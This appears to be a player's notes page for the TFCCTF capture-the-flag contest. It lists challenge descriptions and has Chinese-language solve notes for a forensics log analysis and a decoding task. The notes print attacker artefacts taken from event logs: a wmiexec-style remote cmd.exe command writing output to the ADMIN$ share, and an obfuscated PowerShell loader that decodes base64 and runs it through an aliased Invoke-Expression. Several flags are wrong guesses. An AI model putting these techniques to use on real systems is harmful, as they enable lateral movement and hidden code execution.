Google Drive
Gist
Clipboard
CRYPTO
|
INSANE
minipif
In the aftermath, a few masterminds behind the operation managed to escape and have now relaunched their scheme. We've intercepted their encrypted communications, but we need your expertise to decrypt and decipher them.
flag
CRYPTO
|
HARD
minipif
We heard rumors that someone might rig the upcoming elections. We managed to place a backdoor in one of their messaging systems. See what you can make out of it, the world counts on you.
flag
REVERSE
|
EASY
header
There's a whole world left to explore.
Don't forget the flag format: TFCCTF{stringOfText}
flag
CRYPTO
|
WARMUP
hofill
CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC
CCCCC CCCCC CCCCC
flag
CRYPTO
|
EASY
hofill
Sequences... Sequences sequences... Sequences sequences sequences...
flag
MISC
|
EASY
hofill
Ahhh... the old flag-in-the-Discord challenge. The shenanigans are back, let's hope it goes well! Go to #bot-commands!
Flag format: TFCCTF{secret_message_in_the_discord}
flag
MISC
|
HARD
Hiumee
You got greedy and got stuck in a ruby mine. Find a way out
flag
CRYPTO
|
WARMUP
hofill
I just took a quick look at my DNA. I feel like I was created for this CTF.
CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC
flag
PWN
|
EASY
Luma
Guard this cookie.
Note: If you successfully create a working exploit in the provided Docker, ensure you try the exploit multiple times on the remote system if any issues arise.
flag
FORENSICS
|
MEDIUM
Plig
After the attacker connected to our server, he managed to extract some random data, however encrypted. We trust to decrypt it and get the flag.
TFCCTF{wmiexec_smb_127.0.0.1_admin$}
使用事件檢視器打開
需要找到用於連接的工具、它連接到的服務、其 IP 位址和共享資源資料夾
我想從共享資料夾來找
可以從詳細資料中看到
SubjectUserSid S-1-5-21-4230534742-2542757381-3142984815-1111
SubjectUserName admmig
SubjectDomainName OFFSEC
SubjectLogonId 0x4da321f
ObjectType File
IpAddress 10.23.123.11
IpPort 47020
ShareName \\*\ADMIN$
ShareLocalPath \??\C:\Windows
AccessMask 0x1
AccessList %%4416
ip 10.23.123.11
資料夾 ADMIN$
服務 SMB
工具 PsExec
TFCCTF{psexec_smb_10.23.123.11_admin$} 錯了
後來發現時間序是下面最先,所以從下面往上看
找到最開始的檔案分享,慢慢往前看,可以找到
SubjectUserSid S-1-5-20
SubjectUserName SRVDEFENDER01$
SubjectDomainName OFFSEC
SubjectLogonId 0x3e4
NewProcessId 0xd44
NewProcessName C:\Windows\System32\cmd.exe
TokenElevationType %%1936
ProcessId 0xac8
CommandLine cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1
TargetUserSid S-1-0-0
TargetUserName admmig
TargetDomainName OFFSEC
TargetLogonId 0x4da32af
ParentProcessName C:\Windows\System32\wbem\WmiPrvSE.exe
MandatoryLabel S-1-16-12288
TFCCTF{cmd_wmiexec_10.23.123.11_admin$} 一直嘗試不同的值 但是都錯誤
基本上可以確定smb和admin$兩個是正確的
# *** wmiexec.py
# parent is wmiprvse.exe
# examples:
# cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1
# cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1
TFCCTF{wmiexec_smb_127.0.0.1_admin\$} 應該 沒記得最後答案
https://wenku.csdn.net/answer/4m7p6bxn7x
CRYPTO
|
EASY
minipif
In the heart of an ancient, cursed forest lies the Phantom's lair, shrouded in hellfire. Legends speak of a powerful artifact hidden within, guarded by spectral flames and arcane riddles. Will you be the one to break the curse and uncover the secrets of the Hellfire Phantom?
Note: Challenge requires a bit of bruteforcing. Solver takes ~10 mins to run on my laptop.
Note: sha256sum of the variable secret's value is f8f099dd278c23d44387914def5fc20bc0fb8915d916775e5b4b17275e2107bd, website used is https://emn178.github.io/online-tools/sha256.html, input encoding UTF-8
Note: A person had issue with receiving multiple G points. The one that is used in the challenge ends in 727.
flag
REVERSE
|
WARMUP
Luma
I need to access this tool. Please help me with a license key!
flag
ltrace ./license可以看到使用的函式
把decomplier的名稱重新命名
PWN
|
HARD
Livian
Luma failed maths so I made him a PCI card that will help him do some calculations. Don't think you can exploit it because it only runs my signed firmware :3.
flag
PWN
|
MEDIUM
Mcsky23
Back 2 the chunks back 2 the muney back 2 the writes I don't listen 2 u when u corrupted cause u just talkin out of bytes You'll clear some certain bins just to see us overwrite...
flag
MISC
|
MEDIUM
Mcsky23
I have managed to maintain backdoor access to their server, but the police is lurking around. How can I evade their detection?
flag
PWN
|
INSANE
Mcsky23
I don't really like giving you print functions... but I can give you some guava juice... or some buava buice? Your choice!
flag
REVERSE
|
MEDIUM
Mcsky23
Knights wear armour, but does it protect them from dragons? Flag format: TFCCTF{sha256(password)}
flag
PWN
|
HARD
Mcsky23
100% super secure gaming without spyware or bugz! also idk who has applz??
flag
CRYPTO
|
MEDIUM
minipif
Welcome to Padgrounds, where every bit counts. Dive into the action and let your skills shine as you unravel the coded enigma.
Note: Make sure your solver works locally before running on remote.
flag
WEB
|
HARD
Mtib
You must be quick in order to catch the fish.
Note: Please wait 2-3 minutes for the instance to start. Also, make sure to carefully read the instructions on the main page.
flag
WEB
|
HARD
Mtib
I created this image sharing application. It's SUPER fast. But is it secure?
Note: Please wait 5-6 minutes for the instance to start.
flag
CRYPTO
|
MEDIUM
hofill
Are you ready to rotate your way to victory?
flag
WEB
|
MEDIUM
skyv3il
Our site has been breached. Since then we restricted the ips we can get Nones from. This should reduce our attack surface since no external input gets into our app. Is it safe ?
For the source code, go to /src.php
flag
MISC
|
MEDIUM
Hiumee
Santa doesn't have a lot of room left in his sleigh. Help him fit one more item
flag
MISC
|
EASY
Hiumee
Help us encrypt this message. You don't need to know it
flag
REVERSE
|
EASY
tomadimitrie
Can you catch the right signals for the flag? The flag length is 32 bytes (without the flag format). Flag format: TFCCTF{flag}
flag
MISC
|
HARD
Mtib
Can you bypass this state-of-the-art login system?
Note: The instance setup takes a bit longer, please wait 2-3 minutes after you start it.
flag
FORENSICS
|
EASY
Plig
An attacker managed to gain foothold in our network, but we managed to capture the connection to our server. Analyze the Challenge.evtx and identify the tool used to connect, the service it connected to, its IP address, and the shared resources folder. Flag format: TFCCTF{tool_service_ip_share} Example: TFCCTF{ntlmrelayx_rdp_192.168.0.1_logs$} Note: The flag is in all lowercase (except for TFCCTF).
TFCCTF{v1sual_b4s1c_a1nt_h4rd}
找了很久都沒有想法
突然看到這個 logger 的分類
在找資料的時候也有看到 powershell 的 log,但是沒有看到就放棄了
結果突然發現有把他篩選出來
$FBtFFDr8NXp5 = "=oQDiUGel5SYjF2YiASZslmR0V3TtASKpkiI90zZhFDbuJGc5MEZoVzQilnVIRWe5cUY6lTeMZTTINGMShUYigyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WocmbpJHdTRXZH5COGRVV6oTXn5Wak92YuVkL0hXZU5SblR3c5N1WoASayVVLgQ3clVXclJlYldVLlt2b25WS" ;
$w9r4pBoZlnfIzH1keCtX = $FBtFFDr8NXp5.ToCharArray() ; [array]::Reverse($w9r4pBoZlnfIzH1keCtX) ; -join $w9r4pBoZlnfIzH1keCtX 2>&1> $null ;
$SCr = [SyStem.TexT.encODINg]::uTF8.GeTsTrInG([SYSteM.coNVErT]::froMBaSe64STrinG("$w9r4pBoZlnfIzH1keCtX")) ;
$uqR = "i"+"N"+"V"+"o"+"k"+"e"+"-"+"E"+"X"+"p"+"r"+"E"+"S"+"S"+"i"+"O"+"n" ; NEW-aLIaS -naME pWN -VaLuE $uqR -FORCe ; PWN $SCr ;
.\caca.exe "VHEEVH}x3uwcnad6u3eac3pvaj6tf"
總共有這5筆 執行 但會失敗
直接解密VHEEVH}x3uwcnad6u3eac3pvaj6tf 猜測是位移
丟 rot13 暴力破解得到 [A-Z]+2 TFCCTF}v3sualyb6s3cya3ntyh6rd 失敗
往下看發現還有
ASCII[!-~]+2 TFCCTF{v1sual_b4s1c_a1nt_h4rd
TFCCTF{v1sual_b4s1c_a1nt_h4rd}
WEB
|
EASY
skyv3il
My friend wanted a site on which he could steal other people's photos. Can you break into it ?
flag
PWN
|
HARD
Luma
My teacher wanted me to create a game for the final school project. Hopefully l passed...
Note: This is a sequel to the 'virtual-rev' challenge. Solving the previous one isn't required, but be sure to solve it afterwards :)
flag
REVERSE
|
MEDIUM
Luma
I managed to break into a secret infrastructure, but it seems they use some weird language...
Note: This is a prequel to the pwn challenge "virtual". Make sure you check it out after solving this :)
flag
PWN
|
MEDIUM
Luma
I got tired of remembering my passwords... Password managers are so useful!
flag
-
Any changes
Be notified of any changes
-
Mention me
Be notified of mention me
-
Unsubscribe
Subscribe